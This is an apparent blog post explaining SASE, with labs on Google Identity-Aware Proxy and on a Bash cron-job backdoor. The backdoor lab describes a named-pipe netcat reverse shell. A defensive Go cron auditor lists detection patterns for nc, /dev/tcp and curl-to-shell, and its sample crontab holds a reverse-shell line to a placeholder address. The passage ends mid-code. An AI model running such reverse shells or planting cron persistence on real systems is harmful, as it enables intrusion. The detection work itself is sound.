    • This is an effortless way for attackers to use malicious links inside emails, texts, or social media messages. If those links are clicked, it directs the user to a fake login page to capture their credentials! 
    • Fortunately, there are several preventive measures individuals and organizations can take to safeguard against credential harvester attacks. Implementing robust and unique passwords, enabling two-factor authentication, and regularly updating software and security patches are effective ways to enhance security.
    • Additionally, being cautious of unsolicited emails, scrutinizing URLs before entering credentials, and educating oneself about phishing techniques can significantly reduce the risk of falling victim to such attacks.

In conclusion, the credential harvester attack method poses a significant threat to individuals and organizations. By understanding the techniques employed by attackers, being aware of the consequences, and implementing preventive measures, we can fortify our defenses against these malicious activities. Remember, staying vigilant and practicing good cybersecurity hygiene is the key to staying one step ahead of cybercriminals.

Back to Basics: SASE Definition

Generally, SASE services include SD-WAN, Zero-Trust Network Access (ZTNA), Cloud Access Security Broker (CASB), NGFW, Secure Web Gateway (SWG), unified management, and orchestration. Just what constitutes a real SASE solution varies significantly by source.

Several organizations, such as the Metro Ethernet Forum (MEF), are trying to establish neutral industry standards for SASE. These standards will pave the way for a universal understanding, the ability to integrate multiple manufacturers into a solution, and a method for teaching SASE.

Diagram: Cloud-native application security. The rise of SASE.

SASE Meaning

The rise of SASE and digital transformation

There has been a loss of confidence in the network. As a result, organizations uncover weaknesses in their networks when they roll out digital initiatives. This seems to be true for MPLS backbones and in some SD-WAN designs, where there is a lag in security, cloud connectivity, mobility, and site connectivity.

Confidence in SD-WAN and MPLS has significantly decreased when confronted with the digital structure of network transformation. Intrinsically, SD-WAN is not an all-in-one-encompassing solution, whereas MPLS is rigid and fixed.

Diagram: MPLS Overlay

It is expected to find that they were more confident in their networks before adopting digital transformation than post-digital transformations. Therefore, it is difficult to predict the impact of digital change on networks. Enterprises must ensure they have the proper infrastructure performance and security levels. Digital transformation is not just about replacing MPLS. Networking professionals must broaden their focus to encompass security, cloud, and mobility.

Diagram: SASE definition and the drivers of digital transformation.

WAN Transformation

SASE Meaning

All these problems can be avoided by switching to SASE, a new enterprise networking technology category introduced by Gartner in 2019. SASE means the convergence of security, cloud connectivity, mobility, and site connectivity, enabling the architecture to correlate disparate data points.

It is an all-in-one encompassing solution that provides a ready-made solution for the WAN transformation journey. Gartner expects at least 40% of enterprises to have explicit strategies to adopt SASE by 2024.

Today, customers are looking for a WAN transformation solution that connects and secures all edges – sites, cloud resources, mobile users, and anything else that might emerge tomorrow. MPLS is not the right approach, and some SD-WAN deployments are causing question marks. So, a SASE definition, on the other hand, significantly assists post-digital transformation.

So, let us shine the torch on some of the digital transformation challenges likely to surface. These challenges include complexity with management and operations, site connectivity, performance between locations, inefficient security, and cloud agility.

Diagram: SASE: Combining network and security.

SASE Definition: Secure Access Service Edge (SASE)

The SASE definition combines network security functions (such as SWG, CASB, FWaaS, and Zero Trust Network Access (ZTNA)) with SD-WAN to support organizations’ dynamic, secure access needs. These capabilities are primarily delivered as XaaS and are based on the entity’s identity, real-time context, and security/compliance policies.

SASE changes the focal point to the identity of the user and device. With traditional network design, this was the on-premises data center. The conventional enterprise network and network security architectures place the internal data center as the focal point for access.

These designs are proving ineffective and cumbersome with the rise of cloud and mobile. Traffic patterns have changed considerably, and so has the application logic.

  • A key point: “Software-defined” secure access

SASE consolidates networking and security-as-a-service capabilities into a cloud-delivered secure access service edge. The cloud-delivered service provides you with policy-based “software-defined” secure access. The “software-defined” secure access comprises a worldwide fabric of points of presence (PoPs) and peering relationships. With the PoP design, the general architecture is to move the inspection engines to the sessions, rather than rerouting the sessions to the engines as traditional techniques do. This design is more aligned with today’s traffic patterns and application logic.

        • SASE offers a tailorable network fabric comprising the SASE PoPs geographically dispersed.

The architecture allows you to accurately specify every network session’s performance, reliability, security, and cost. This is based on identity and context. For practical, secure access, decisions must be centered on the entity’s identity at the source of the connection, not on a traditional construct such as the IP address or mere network location. The requesting entity can be a user, device, branch office, IoT device, or edge computing location, with policy based on these parameters.

 

Lab Guide: Identity-Aware-Proxy

Identity Security with Google Cloud

Next, we will have a look at identity security and Google Cloud. Here, I have a minimal web application on Google App Engine. Then, an Identity-Aware Proxy (IAP) restricts access based on parameters that I can configure.

Note:

  1. An identity-aware proxy (IAP) is a Google Cloud service allowing fine-grained access control to applications and resources based on user identity. By integrating with Google Cloud Identity and Access Management (IAM), IAP enables organizations to define and enforce access policies easily.
  2. IAP provides a robust solution, whether protecting sensitive data or mitigating the risk of unauthorized access.

See below; I have enabled IAP for a simple application. For access, I now need to tell the IAP service who can access the application. I do this by adding principals.

Once an app is protected with IAP, it can use the identity information that IAP provides in the web request headers it passes through. So, for additional identity information, the application will get the logged-in user’s email address and a persistent unique user ID assigned by the Google Identity Service to that user. Notice below the additional lines in the application code that read the IAP-provided identity data; the IAP service supplies these values in the X-Goog-Authenticated-User-* request headers.

Note:

If there is a risk of IAP being turned off or bypassed, your app can check to make sure the identity information it receives is valid. This uses a third web request header added by IAP called X-Goog-IAP-JWT-Assertion. The header’s value is a cryptographically signed object containing user identity data. Your application can verify the digital signature and use the data provided in this object to ensure that IAP provided it without alteration.

Digital signature verification requires several extra steps, such as retrieving the latest set of Google public keys. You can decide whether your application needs these additional steps based on the risk that someone can turn off or bypass IAP and the application’s sensitivity.
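The verification the note describes, as an added example that is not part of the original post or of Google’s own client libraries: the code parses the X-Goog-IAP-JWT-Assertion value, pins the algorithm to ES256, looks the signing key up by its kid in a trusted key set, checks the signature before reading any claim, and only then validates the issuer, the audience and the expiry. The key set is a locally generated P-256 key standing in for Google’s published public keys, the audience string is a placeholder, and SignSample and NewSampleKey exist only so the verifier can be exercised offline; in a deployed app the public keys are retrieved from Google (the “extra steps” the post mentions) and the audience is the app’s own value.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"fmt"
	"math/big"
	"strings"
	"time"
)

const iapIssuer = "https://cloud.google.com/iap" // issuer Google documents for IAP assertions

// IAPClaims is the identity data the app may trust once the token verifies.
type IAPClaims struct {
	Iss   string `json:"iss"`
	Aud   string `json:"aud"`
	Email string `json:"email"`
	Exp   int64  `json:"exp"`
}

// decodeSegment base64url-decodes one JWT segment and unmarshals its JSON.
func decodeSegment(seg string, v interface{}) error {
	raw, err := base64.RawURLEncoding.DecodeString(seg)
	if err != nil {
		return err
	}
	return json.Unmarshal(raw, v)
}

// VerifyIAPAssertion returns the claims only if the token is ES256-signed by a key in
// keys (looked up by kid), names the expected issuer and audience, and is unexpired at now.
func VerifyIAPAssertion(token, expectedAud string, keys map[string]*ecdsa.PublicKey, now time.Time) (*IAPClaims, error) {
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return nil, fmt.Errorf("malformed token: expected header.payload.signature")
	}
	var hdr struct{ Alg, Kid string } // encoding/json matches "alg"/"kid" case-insensitively
	if err := decodeSegment(parts[0], &hdr); err != nil {
		return nil, fmt.Errorf("bad header: %w", err)
	}
	// Pin the algorithm (the token must not get to choose "none" or an HMAC alg)
	// and select the verification key by kid from the trusted set only.
	pub, ok := keys[hdr.Kid]
	if hdr.Alg != "ES256" || !ok {
		return nil, fmt.Errorf("unsupported alg %q or unknown kid %q", hdr.Alg, hdr.Kid)
	}
	sig, err := base64.RawURLEncoding.DecodeString(parts[2])
	if err != nil || len(sig) != 64 {
		return nil, fmt.Errorf("bad signature encoding or length")
	}
	// JWS ES256 signatures are the raw 32-byte r and s values concatenated, not DER.
	r, s := new(big.Int).SetBytes(sig[:32]), new(big.Int).SetBytes(sig[32:])
	digest := sha256.Sum256([]byte(parts[0] + "." + parts[1]))
	if !ecdsa.Verify(pub, digest[:], r, s) {
		return nil, fmt.Errorf("signature does not verify against the IAP key")
	}
	// Claims are parsed only after the signature has been checked.
	var c IAPClaims
	if err := decodeSegment(parts[1], &c); err != nil {
		return nil, fmt.Errorf("bad payload: %w", err)
	}
	if c.Iss != iapIssuer || c.Aud != expectedAud {
		return nil, fmt.Errorf("issuer %q or audience %q not accepted", c.Iss, c.Aud)
	}
	if !now.Before(time.Unix(c.Exp, 0)) {
		return nil, fmt.Errorf("token expired")
	}
	return &c, nil
}

// NewSampleKey makes a throwaway P-256 key pair for the demonstration; in production
// the public half comes from Google's published IAP keys, never from the app itself.
func NewSampleKey() (*ecdsa.PrivateKey, error) { return ecdsa.GenerateKey(elliptic.P256(), rand.Reader) }

// KeySet wraps one public key in the kid-indexed map the verifier expects.
func KeySet(kid string, priv *ecdsa.PrivateKey) map[string]*ecdsa.PublicKey {
	return map[string]*ecdsa.PublicKey{kid: &priv.PublicKey}
}

// SignSample builds an ES256 token over c, standing in for IAP's signer so the
// verifier can be exercised offline.
func SignSample(priv *ecdsa.PrivateKey, kid string, c IAPClaims) (string, error) {
	enc := base64.RawURLEncoding.EncodeToString
	hdr, _ := json.Marshal(map[string]string{"alg": "ES256", "kid": kid})
	body, _ := json.Marshal(c)
	signingInput := enc(hdr) + "." + enc(body)
	digest := sha256.Sum256([]byte(signingInput))
	r, s, err := ecdsa.Sign(rand.Reader, priv, digest[:])
	if err != nil {
		return "", err
	}
	sig := make([]byte, 64)
	r.FillBytes(sig[:32]) // left-pad each value to exactly 32 bytes as JWS requires
	s.FillBytes(sig[32:])
	return signingInput + "." + enc(sig), nil
}
```

The order of the checks is the point: the algorithm is fixed by the verifier rather than read from the token, the key is chosen from the trusted set rather than from anything the token carries, and no claim is read until the signature has verified. A token for a different audience, an expired token, or one signed by a key that is not in the set is rejected with an error and yields no identity at all.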

IAP Key Features and Benefits

a) Secure Access Control: IAP offers granular control over who can access specific resources, ensuring that only authorized individuals can gain entry. By leveraging context-aware access policies, organizations can define rules based on user attributes, device security status, and more.

b) Multi-Factor Authentication (MFA): IAP supports using MFA, adding an extra layer of security to the authentication process. The risk of unauthorized access is further reduced by requiring users to provide additional verification factors such as SMS codes or security keys.

c) Centralized Logging and Auditing: IAP provides detailed logs and audit trails, allowing organizations to monitor and track access attempts. This enhances visibility and enables swift action against potential security threats.

Implementing Identity-Aware Proxy

Implementing IAP within your Google Cloud environment is a straightforward process. By following these steps, you can ensure a seamless integration:

a) Enabling IAP: Start by enabling IAP in the Google Cloud Console for the desired project. This will activate the necessary APIs and services.

b) Configuring Access Policies: Define access policies based on user identity, resource paths, and other criteria using the Cloud Console or the IAP API.

c) Fine-Tuning Authentication Methods: Customize the authentication methods according to your organization’s security requirements. This includes enabling MFA and deciding whether to allow or deny unauthenticated users.

Conclusion: Identity-Aware Proxy (IAP) is a robust security solution offered by Google Cloud. With its granular access control, multi-factor authentication, and centralized logging capabilities, IAP provides organizations with the means to ensure secure access to their cloud resources. By implementing IAP, businesses can enhance their security posture and protect against potential threats.

Security and Identity

With a SASE platform, when we create an object, such as a policy in the networking domain, it is then available in other domains, such as security. So, any policies assigned to users are tied to that user regardless of network location. This removes the complexity of managing network and security policies across multiple areas, users, and devices. Again, all of this can be done from one platform.

Also, when examining security solutions, many buy individual appliances that focus on one job. To troubleshoot, you need to gather information, such as the logs from each device. A SIEM is valuable, but only some organizations can run one because it is resource-heavy. For those who don’t have ample resources, the manual process is backbreaking, and there will be false positives.

Diagram: SASE security. The PoP architecture.

SASE Definition with Challenge 1: Managing the Network

Looking across the entire networking and security industry, everyone sells individual point solutions that are not a holistic joined-up offering. Thinking only about MPLS replacement leads to incremental, point solution acquisitions when confronted by digital initiatives, making their networks more complex and costly.

Principally, distributed appliances for network and security at every location require additional tasks such as installation, ongoing management, regular updates, and refreshes. This results in far too many security and network configuration points. We see this all the time with NOC and SOC integration efforts.

Numerous integration points

The point-solution approach addresses one issue and requires a considerable amount of integration. Therefore, you must constantly add solutions to the stack, likely resulting in management overhead and increased complexity. Let’s say you are searching for a new car. Would you prefer to build the car with all the different parts or buy the already-built one?

In the same way, if we examine the network and security industry, the way it has been geared up presently is provided in parts. It’s your job to support, manage, and build the stack over time and scale it when needed. Fundamentally, it would help if you were an expert in all the different parts.

However, if you abstract the complexity into one platform, you don’t need to be an expert in everything. SASE is one of the effective ways to abstract management and operational complexity.

SASE Meaning: How SASE solves this

Converging network and security into a single platform does not require multiple integration points. This will eliminate the need to deploy these point solutions and the complexities of managing each. Essentially, with SASE, we can bring each point solution functionalities together and place them under one hood – the SASE cloud. SASE merges all of the networking and security capabilities into a single platform.

This way, you now have a holistic joined-up offering. Customers don’t need to perform upgrades, size, and scale their network. Instead, all this is done for them in the SASE cloud, creating a fully managed and self-healing architecture.

Besides, if something goes wrong in one of the SASE PoPs, the convergence time is minimal. All of this is automatic, and there is no need to set up new tunnels or have administrators step in to perform configurations.

Diagram: SASE definition. No more point solutions.

SASE Definition with Challenge 2: Site Connectivity

SD-WAN appliances require other solutions for global connectivity and to connect, secure, and manage mobile users and cloud resources. As a result, many users are turning to Service Providers to handle the integration. The carrier-managed SD-WAN providers integrate a mix of SD-WAN and security devices to form SD-WAN services.

Unfortunately, this often makes the Service Providers inflexible in accommodating new requests. The telco’s lack of agility and high bandwidth costs will remain problematic. Deploying new locations has been the biggest telco-related frustration, especially when connecting offices outside of the telco’s operating region to the company’s MPLS network. For this, they need to integrate with other telcos.

Video: SD-WAN

In the following video, we will address the basics of SD-WAN and the challenges of the existing WAN. We will also go through popular features of SD-WAN and integration points with, for example, SASE.

SD WAN Tutorial

SASE Meaning: How SASE solves this

SASE handles all of the complexities of management. As a result, the administrative overhead for managing and operating a global network that supports site-to-site connectivity and enhanced security, cloud, and mobility is kept to an absolute minimum.

SASE Definition with Challenge 3: Performance Between Locations

The throughput is primarily determined by latency and packet loss, not bandwidth. Therefore, for an optimal experience for global applications, we must explore ways to manage the latency and packet loss end-to-end for last-mile and middle-mile segments. Most SD-WAN vendors don’t control these segments, affecting application performance and service agility.

Consequently, there will be constant tweaking at the remote ends to attain the best performance for your application. With SD-WAN, we can bundle transports and perform link bonding to solve the last mile. However, this does not create any benefits for the middle mile bandwidth.

MPLS will help you overcome the middle-mile problems, but you will likely pay a high price.

Diagram: Define SASE. Link bonding is only suitable for last-mile performance.

SASE Meaning: How SASE solves this

The SASE cloud already has an optimized converged network and security platforms. Therefore, sites need to connect to the nearest SASE PoP. This way, the sites are placed on the global private backbone to take advantage of global route optimization, dynamic path selection, traffic optimization, and end-to-end encryption. The traffic can also be routed over MPLS, directly between sites (not through the SASE PoP), and from IPsec tunnels to third-party devices. The SASE architecture optimizes the last and middle-mile traffic flows.

Optimization techniques

The SASE global backbone has several techniques that improve the network performance, resulting in predictable, consistent latency and packet loss. The SASE cloud has complete control of each PoP and can employ optimizations. It uses proprietary routing algorithms that factor in latency, packet loss, and jitter.

These routing algorithms favor performance over cost and select the optimal route for every network packet. This is compared to Internet routing, where metrics don’t consider what is best for the application or the type.

SASE Definition with Challenge 4: Cloud Agility

Cloud applications are becoming the most critical to organizations, even more critical than those hosted in private data centers. When delivering cloud resources, we must consider more than just providing connectivity. In the past, when we spoke about agility, we were concerned only with the addition of new on-premises sites.

However, now this conversation needs to encompass the cloud. Primarily, delivering cloud applications is about providing an application experience as responsive as that of on-premises applications. However, most SD-WANs are slow to deliver new public cloud infrastructure. MPLS is expensive, rigid, and not built for cloud access.

SASE Meaning: How SASE solves this

Cloud Native Meaning

SASE natively supports cloud data centers (IaaS) and applications (SaaS) without additional configuration, complexity, or point solutions, enabling built-in cloud connectivity. This further enables the rapid delivery of new public cloud infrastructure.

The SASE PoPs are co-located in the data centers, directly connected to the IXPs of the leading IaaS providers, such as Amazon AWS, Microsoft Azure, and Google Cloud Platform. In addition, cloud applications are optimized through SASE’s ability to define the egress points. This helps exit the cloud application traffic at the points closest to the customer’s application instance.

The optimal global routing algorithms can determine the best path from anywhere to the customer’s cloud application instance. This provides optimal performance to the cloud applications regardless of the user’s location.

So, when we talk about performance to the cloud with SASE, the latency to the cloud is comparable to the optimized access provided by the cloud providers, such as AWS Direct Connect or Azure Express Route. So, authentically, SASE provides out-of-the-box cloud performance.

SASE Definition with Challenge 5: Security

The security landscape is constantly evolving, so network security solutions must evolve with it to stay well-founded. Ransomware and malware will continue to be the primary security concerns from 2020 onward. Combating them is a challenge for the entire organization when the solutions involved have complex integration points scattered through the network domain.

Security must be a part of any WAN transformation initiative, protecting the users and resources regardless of the underlying network, and managed through a single pane of glass.

However, a bundle of non-integrated security products results in appliance sprawl that hinders your security posture instead of strengthening it. The security solution must defend against emerging threats like malware/ransomware. In addition, it must boost the ability to enforce corporate security policies on mobile users.

Finally, the security solution must also address the increasing cost of buying and managing security appliances and software.

Diagram: SASE Edge: The issues of service chaining.

Security and encryption

So, we know there is an increase in complexity due to the disparate tools required to address the different threat vectors. For example, DLP functionality can be spread across the SWG, the CASB, and a standalone DLP product, with three different teams managing each. What about the impact of encrypted web traffic on the security infrastructure?

The issue is that most internet traffic is now encrypted, and attackers deliver payloads, deliver command and control instructions, and exfiltrate data over encrypted protocols. Organizations cannot decrypt all network traffic, both for performance reasons and to avoid inspecting sensitive employee information.

There are also issues with the scalability of encrypted traffic management solutions, which can cause performance problems of their own.

Lab Guide: Security Backdoors

Using Bash

Bash, short for “Bourne Again SHell,” is a widely used command-line interpreter in Unix-based systems. It provides powerful scripting capabilities, making it a favorite among system administrators and developers. However, this versatility also brings the potential for misuse. This section will explain what a Bash backdoor is and how it functions.

Note:

In the following, I created a backdoor on a corporate machine to maintain persistence within the environment. I used a bash script and configured the system with cron jobs. You will then connect to the created backdoor. Here, we demonstrate how tools available on standard operating system installations can be used to bypass an organization’s security controls.

Cron jobs, derived from the word “chronos” meaning time in Greek, are scheduled tasks that run automatically in the background of your server. They follow a specific syntax, using fields to specify when and how often a task should be executed. You can create precise and reliable automated processes by grasping the structure and components of cron jobs.


Analysis: First, the file called file is deleted with the rm command if it already exists. Next, a named pipe, a special file that acts as a new communications channel, is created with the name file. Anything passed to the bash terminal, such as typed commands, is transmitted to a specific IP address and port through the pipe. The | indicates the point at which the output of one Linux command is passed as input to the next command. Using this single line, you can create a network connection to a specific machine, giving a remote user access.

Analysis: First, errors when running the cron task are ignored and not printed on the screen. Then, the new cron job is printed to the screen; in this example, the backdoor bash shell will run every minute. The output of the echoed command is then written to the crontab file with crontab. 
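A defender-side counterpart to the lab, as an added example that is not part of the original post: a small Go auditor that parses the five schedule fields and the command of each crontab entry and flags entries that combine the indicators described above (an every-minute or @reboot schedule, network tools such as nc or mkfifo in the command, execution from a world-writable or hidden directory, and silenced errors). The sample crontab is constructed for the example, with a TEST-NET address standing in for a real host; the indicator patterns are my own heuristics and the function and type names are my own.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Finding is one crontab entry that matched persistence indicators, with the
// reasons it was flagged so an analyst can judge it quickly.
type Finding struct {
	Line    string
	Reasons []string
}

type cronEntry struct {
	schedule string // the five time fields joined, or an @-shortcut such as @reboot
	command  string
}

// Indicator patterns (assumed heuristics, not an exhaustive signature set).
var (
	networkTool  = regexp.MustCompile(`(^|[\s;|&(])(nc|ncat|netcat|socat|telnet)\s|/dev/tcp/|/dev/udp/|mkfifo\b|bash -i\b`)
	beaconFetch  = regexp.MustCompile(`\b(curl|wget)\b.*\|\s*(ba)?sh\b`)
	stagingDir   = regexp.MustCompile(`(^|[\s;|&"'=])(/tmp/|/dev/shm/|/var/tmp/)|/\.[A-Za-z0-9_-]+/`)
	silentErrors = regexp.MustCompile(`2>\s*/dev/null|2>&1`)
)

// parseCronLine splits a crontab line into schedule and command. Blank lines,
// comments and VAR=value assignments return ok=false.
func parseCronLine(line string) (e cronEntry, ok bool) {
	fields := strings.Fields(line)
	if len(fields) == 0 || strings.HasPrefix(fields[0], "#") {
		return e, false
	}
	if strings.HasPrefix(fields[0], "@") && len(fields) >= 2 { // @reboot, @daily, ...
		return cronEntry{schedule: fields[0], command: strings.Join(fields[1:], " ")}, true
	}
	if len(fields) < 6 || strings.Contains(fields[0], "=") {
		return e, false
	}
	return cronEntry{schedule: strings.Join(fields[:5], " "), command: strings.Join(fields[5:], " ")}, true
}

// reasonsFor lists the indicators an entry matches; strong is true when the
// command itself carries a network/reverse-connection or download-and-run pattern.
func reasonsFor(e cronEntry) (reasons []string, strong bool) {
	switch e.schedule {
	case "* * * * *":
		reasons = append(reasons, "runs every minute")
	case "@reboot":
		reasons = append(reasons, "runs at every boot")
	}
	if networkTool.MatchString(e.command) {
		reasons, strong = append(reasons, "command uses a network or reverse-connection tool"), true
	}
	if beaconFetch.MatchString(e.command) {
		reasons, strong = append(reasons, "command downloads content and pipes it into a shell"), true
	}
	if stagingDir.MatchString(e.command) {
		reasons = append(reasons, "command runs from a world-writable or hidden directory")
	}
	// Silenced errors are common in benign jobs, so they only corroborate other indicators.
	if silentErrors.MatchString(e.command) && len(reasons) > 0 {
		reasons = append(reasons, "errors are silenced")
	}
	return reasons, strong
}

// SuspiciousCronEntries flags entries with a strong indicator or at least two weak ones.
func SuspiciousCronEntries(crontab string) []Finding {
	var out []Finding
	for _, line := range strings.Split(crontab, "\n") {
		e, ok := parseCronLine(line)
		if !ok {
			continue
		}
		if reasons, strong := reasonsFor(e); strong || len(reasons) >= 2 {
			out = append(out, Finding{Line: strings.TrimSpace(line), Reasons: reasons})
		}
	}
	return out
}

// Constructed sample: an ordinary user crontab plus two injected persistence entries.
// 203.0.113.5 is a TEST-NET address used as a placeholder.
const sampleCrontab = `SHELL=/bin/bash
MAILTO=ops@example.com
# nightly backup
0 2 * * * /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
*/5 * * * * /usr/bin/check_disk --warn 90
* * * * * rm -f /tmp/file; mkfifo /tmp/file; nc 203.0.113.5 4444 < /tmp/file > /dev/null 2>&1
@reboot /home/svc/.cache/.x/update >/dev/null 2>&1
`

func main() {
	for _, f := range SuspiciousCronEntries(sampleCrontab) {
		fmt.Printf("SUSPICIOUS: %s\n  reasons: %s\n", f.Line, strings.Join(f.Reasons, "; "))
	}
}
```

Run against the output of crontab -l for each user (and the files under /etc/cron.d), the auditor reports the every-minute named-pipe entry and the @reboot job hidden under a dot-directory while leaving the backup and disk-check jobs alone. The scoring deliberately treats an every-minute schedule or silenced errors as corroboration only, since plenty of legitimate monitoring jobs do both; a network tool or a download-and-run pipeline in the command is enough on its own.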

Conclusion: 

Backdoor access refers to a hidden method or vulnerability intentionally created within a system or software that allows unauthorized access or control. It is an alternative entry point that bypasses conventional security measures, often undetected.

While backdoor access can be misused for malicious purposes, it is essential to acknowledge that there are legitimate reasons for its existence. Government agencies may utilize backdoor access to monitor criminal activities or ensure national security. Additionally, software developers may implement backdoor access for debugging and maintenance purposes.

Stringent security measures are necessary to counter the threats posed by backdoor access. Regular system audits, vulnerability assessments, and robust encryption protocols can help identify and patch potential vulnerabilities. Fostering a security-conscious culture among users and promoting awareness of potential risks can strengthen overall cybersecurity.

Video: Stateful Inspection Firewall

We know we have a set of well-defined protocols that are used to communicate over our networks. Let’s call these communication rules. You are probably familiar with the low-layer transport protocols, such as TCP and UDP, and higher application layer protocols, such as HTTP and FTP.

Generally, we interact directly with the application layer and have networking and security devices working at the lower layers. So when Host A wants to talk to Host B, it will go through a series of communication layers with devices working at each layer. A device that works at one of these layers is a stateful firewall.

Stateful Inspection Firewall

MPLS and SD-WAN

MPLS does not protect the resources and users, certainly not those connected to the Internet. On the other hand, SD-WAN service offerings are not all created equal, since many do not include firewall/security features for threat protection across all edges – mobile devices, sites, and cloud resources. This lack of integrated security complicates SD-WAN deployments and often leads to malware getting past the perimeter unnoticed.

The cost involved

Security solutions are expensive, and there is never a fixed price. Some security vendors may charge on the usage models for which you don’t yet have the quantity. This makes the process of planning extremely problematic and complex. As the costs keep increasing, we often find that security professionals would trade off point-security solutions due to the associated costs. This is not an effective risk-management strategy.

The security controls are also limited to mobile VPN solutions. More often than not, they are very coarse, forcing IT to open access to all the network resources. Protecting mobile users requires additional security tools like next-generation firewalls (NGFWs). So again, we have another point solution. In addition, mobile VPN solutions provide no last- or middle-mile optimization.

SASE Meaning: How SASE solves this

SASE converges a complete security stack into the network, allowing SASE to bring granular control to sites and to mobile and cloud resources. This is done by enforcing zero-trust principles for all edges. SASE provides anti-malware protection for both WAN and Internet traffic. In addition, for malware detection and prevention, SASE can offer signature-based and machine-learning protection consisting of several integrated anti-malware engines.

For malware communication, SASE can stop the outbound traffic to C&C servers based on reputation feeds and network behavioral analysis. Mobile user traffic is fully protected by SASE’s advanced security services, including NGFW, secure web gateway (SWG), threat prevention, and managed threat detection and response.

Furthermore, in the case of mobile, SASE mobile users can dynamically connect to the closest SASE PoP regardless of the location. Again, as discussed previously, the SASE cloud’s relevant optimizations are available for mobile users.

Rethink the WAN

The shift to the cloud, edge computing, and mobility offer new opportunities for IT professionals. To support these digital initiatives, the network professionals must rethink their approach to the WAN transformation. WAN transformation is not just about replacing MPLS with SD-WAN. It needs an all-encompassing solution that provides the proper network performance and security level for enhanced site-to-site connectivity, security, mobile, and cloud.

Diagram: SASE, a network security solution.

SASE Meaning: SASE wraps up

SASE is a network and security architecture consolidating numerous network and security functions, traditionally delivered as siloed point solutions, into an integrated cloud service. It combines several network and security capabilities along with cloud-native security functions. The functions are produced from the cloud and provided by the SASE vendor.

They are essentially providing a consolidated, platform-based approach to security. We have a cloud-delivered solution consolidating multiple edge network security controls and network services into a unified solution with centralized management and distributed enforcement.

The appliance-based perimeter

Even though there has been a shift to the cloud, the traditional perimeter network security solution has remained appliance-based. The motivation for moving security controls to the cloud is better protection and performance, plus ease of deployment and maintenance.

The initial performance limitations of earlier cloud-delivered solutions have been overcome with the introduction of optimized routing and a global footprint. However, there is a split in opinion about performance and protection. Many consider protection and performance prime reasons to remain on-premises and keep the network security solutions on-premises.

Key Components of SASE

The key components of SASE include software-defined wide-area networking (SD-WAN), cloud-native secure web gateways (SWG), zero-trust network access (ZTNA), firewall-as-a-service (FWaaS), and data loss prevention (DLP), among others. These components work harmoniously to provide organizations with a holistic and scalable solution for secure network connectivity, regardless of the location or device used by the end-user.

Benefits of SASE

SASE offers numerous benefits for organizations seeking to enhance their network infrastructure and security posture. Firstly, it provides simplified network management by consolidating various functions into a unified platform. Secondly, it offers an improved user experience through optimized connectivity and reduced latency. Additionally, SASE enables organizations to embrace cloud services securely and facilitates seamless scalability to adapt to changing business demands.

Implications for the Future

As businesses embrace digital transformation and remote work becomes more prevalent, the demand for flexible and secure network architectures like SASE is expected to skyrocket. SASE empowers organizations to overcome the limitations of traditional network setups and enables them to thrive in an increasingly dynamic and interconnected world. With its cloud-native approach and emphasis on security, SASE is poised to redefine how networks are designed and managed in the coming years.




Key SASE Definition Summary Points:

Main Checklist Points To Consider

  • The rise of SASE and the causes of digital transformation.

  • Technical details on the issues of MPLS with the lack of agility. 

  • Technical details on the SASE PoP and the converging of networking and security to a SaaS solution.

  • Discuss the numerous challenges of managing the network and how SASE solves this.

  • A final note on the appliance-based perimeter.

 

Summary: SASE Definition

With the ever-evolving landscape of technology and the increasing demand for secure and efficient networks, a new paradigm has emerged in the realm of network security – SASE, which stands for Secure Access Service Edge. In this blog post, we delved into the definition of SASE, its key components, and its transformative impact on network security.

Section 1: Understanding SASE

SASE, pronounced “sassy,” is a comprehensive framework that combines network security and wide area networking (WAN) capabilities into a single cloud-based service model. It aims to provide users with secure access to applications and data, regardless of their location or the devices they use. By converging networking and security functions, SASE simplifies the network architecture and enhances overall performance.

Section 2: The Key Components of SASE

To fully grasp the essence of SASE, it is essential to explore its core components. These include:

1. Secure Web Gateway (SWG): The SWG component of SASE ensures safe web browsing by inspecting and filtering web traffic, protecting users from malicious websites, and enforcing internet usage policies.

2. Cloud Access Security Broker (CASB): CASB provides visibility and control over data as it moves between the organization’s network and multiple cloud platforms. It safeguards against cloud-specific threats and helps enforce data loss prevention policies.

3. Firewall-as-a-Service (FWaaS): FWaaS offers scalable and flexible firewall protection, eliminating the need for traditional hardware-based firewalls. It enforces security policies and controls access to applications and data, regardless of their location.

4. Zero Trust Network Access (ZTNA): ZTNA ensures that users and devices are continuously authenticated and authorized before accessing resources. It replaces traditional VPNs with more granular and context-aware access policies, reducing the risk of unauthorized access.
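The ZTNA item above describes access decisions that are made per request, from identity, device posture and context, rather than once at the network edge as a VPN does. The following policy engine is an added illustration written for this summary; it is not Cisco code or part of any SASE product, and every resource name, group, posture attribute and country code in it is a constructed sample value.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# Constructed sample model of a zero-trust access decision (not a product API).
# Each request is evaluated against the policy of the one resource it names;
# nothing is granted at the network level, and unknown resources are denied.


@dataclass
class DevicePosture:
    managed: bool          # enrolled in management (reports the fields below)
    disk_encrypted: bool
    os_patched: bool
    edr_running: bool


@dataclass
class AccessRequest:
    user: str
    groups: Set[str]
    mfa_verified: bool
    device: DevicePosture
    source_country: str    # context attribute, e.g. from the connecting IP
    resource: str          # the single application being requested


@dataclass
class ResourcePolicy:
    allowed_groups: Set[str]
    require_mfa: bool = True
    require_managed_device: bool = True
    allowed_countries: Optional[Set[str]] = None   # None = no geo restriction


# Constructed policies for two hypothetical applications.
POLICIES: Dict[str, ResourcePolicy] = {
    "payroll-app": ResourcePolicy(allowed_groups={"finance"},
                                  allowed_countries={"US", "IE"}),
    "wiki": ResourcePolicy(allowed_groups={"employees"},
                           require_managed_device=False),
}


def evaluate(req: AccessRequest) -> Tuple[bool, List[str]]:
    """Return (allowed, reasons). Every failed check is recorded so that the
    denial can be logged and explained; the decision is default deny."""
    policy = POLICIES.get(req.resource)
    if policy is None:
        return False, ["no policy for resource (default deny)"]

    reasons: List[str] = []
    if not (req.groups & policy.allowed_groups):
        reasons.append("user not in an allowed group")
    if policy.require_mfa and not req.mfa_verified:
        reasons.append("MFA not verified")
    if policy.require_managed_device:
        if not req.device.managed:
            reasons.append("unmanaged device")
        elif not (req.device.disk_encrypted and req.device.os_patched
                  and req.device.edr_running):
            reasons.append("device posture failed")
    if (policy.allowed_countries is not None
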